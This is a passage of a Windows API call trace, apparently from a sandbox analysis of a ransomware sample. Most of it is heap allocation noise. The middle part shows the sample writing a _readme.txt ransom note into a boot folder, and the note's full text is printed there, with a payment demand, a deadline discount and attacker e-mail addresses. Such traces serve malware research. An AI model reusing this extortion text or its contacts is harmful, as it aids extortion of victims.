HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.667] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0228.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.667] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.667] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.667] PathFindFileNameW (pszPath="") returned="" [0228.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.667] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.667] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.667] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.668] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.668] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0228.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.668] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0228.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.669] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.669] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.669] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.669] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.670] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.670] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.670] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.670] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.670] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] 